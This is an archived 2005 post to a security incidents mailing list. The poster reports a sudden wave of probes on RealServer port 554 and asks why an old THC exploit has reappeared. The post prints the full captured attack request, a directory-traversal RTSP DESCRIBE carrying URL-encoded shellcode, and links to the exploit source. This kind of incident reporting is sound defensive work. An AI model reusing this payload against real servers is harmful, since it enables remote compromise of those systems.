THC's RealServer (port 554) exploit?

From: Stefan Pettersson (stefan.pets_at_home.se)
Date: 02/16/05

  • Next message: Collin: "Re: New MSN worm?"
    Date: Wed, 16 Feb 2005 17:53:07 +0100
    To: incidents@securityfocus.com
    
    

    Hi, I'm kinda new in this field so, please bear with me.

    I've got a massive increase on connection requests to port 554 (RealServer) this
    afternoon. I haven't given much thought about earlier connections but when looking
    through the firewall log I see that I've gotten a few in the past as well. There is
    however no doubt that the traffic has increased _greatly_ this afternoon. (Almost)
    every attempt are sent by a different address. I don't know if these are decoys
    though.

    I was curious about this so I opened the port up and ran

    nc -l -p 554 > output

    to see what the probes tried to send. What I got was definately an exploit attempt.

    DESCRIBE /../../../../ΜΜ%eb%15%b9%8b%e6%13%41%81%f1%39%e6%13%41%5e%80%74%31%ff%9e%e2%f9%eb%05%e8%e6%ff%ff%ff%ad%45%fa%15%dd%ae%15%de%92%15%ee%82%33%15%e6%96%76%db%9e%9e%9e%cd%c8%15%c1%a2%15%c2%a5%e6%9d%41%cd%15%c5%be%9d%41%cd%1d%5d%9a%15%ad%9d%69%ad%57%32%ac%56%5f%5f%9b%1a%5e%eb%68%b5%54%eb%77%c6%b5%46%4f%75%c0%9d%c0%ba%9d%41%f8%15%95%15%c0%82%9d%41%15%9a%15%9d%59%c0%c5%61%7e%c0%f6%ad%ac%9e%9e%f6%e9%ed%ac%c1%ca%24%0c%f0%9a%1a%61%48%15%66%1f%72%9e%9c%9e%9e%15%72%cd%f4%9f%f4%9c%24%1d%cd%1d%9e%61%48%cd%cd%f6%4d%43%8d%24%f6%9c%9e%7e%ec%15%4a%15%46%f4%8e%cc%cd%24%fd%ae%fe%c4%61%48%ce%2a%9c%ce%cb%cd%24%9e%c6%fe%7c%61%48%21%a3%36%27%f3%61%7b.smi RTSP/1.0

    I removed a "few" /../..

    Searching the web for this and found that this is an old exploit, most likely this
    one:

    http://www.thc.org/exploits/THCrealbad.c

    But that one is almost two years old, why does it show up this much now? So suddenly.
    It has only been going on for a few hours. Is there something new that has come out
    or is it just a coincidence?

    Regards,
    Stefan Pettersson


  • Next message: Collin: "Re: New MSN worm?"

    Relevant Pages

    • Re: Abnormal activity.
      ... My computer receives many connection requests on port 4662 because that is ... to facilitate one-on-one interaction with one of our expert instructors. ... Attend a course taught by an expert instructor with years of in-the-field ...
      (Security-Basics)
    • Re: VoIP and SSH
      ... My father's router wasn't forwarding connection requests for any port that we'd configured for sshd to listen on. ... Oddly enough, if he unplugs his VoIP box from his network, all this problem goes away and connection requests over ssh and port 22 are forwarded fine. ...
      (freebsd-questions)
    • Re: Port 31336 question
      ... > lead to believe someones targets that specific IP. ... connection requests if they receive no replies (and some even if they ... and telling people to check their machines for trojans based ... on port scans is even more ridiculous. ...
      (comp.security.firewalls)
    • Re: Two Services Listening on Same Port
      ... > listening on the same port, and some sort of director that decides ... Not much you can do about your employer's FW filters but I would ... complain/switch ISPs that insisted on rejecting connection requests on ...
      (comp.os.linux.networking)
    • Re: Blocking/responding to port scans
      ... But if you put /your/ services on odd-ball port numbers, ... You may not be able to outrun the bear, but you don't need to; ... Why do we put suits in a garment bag, and put garments in a suitcase? ...
      (comp.os.linux.security)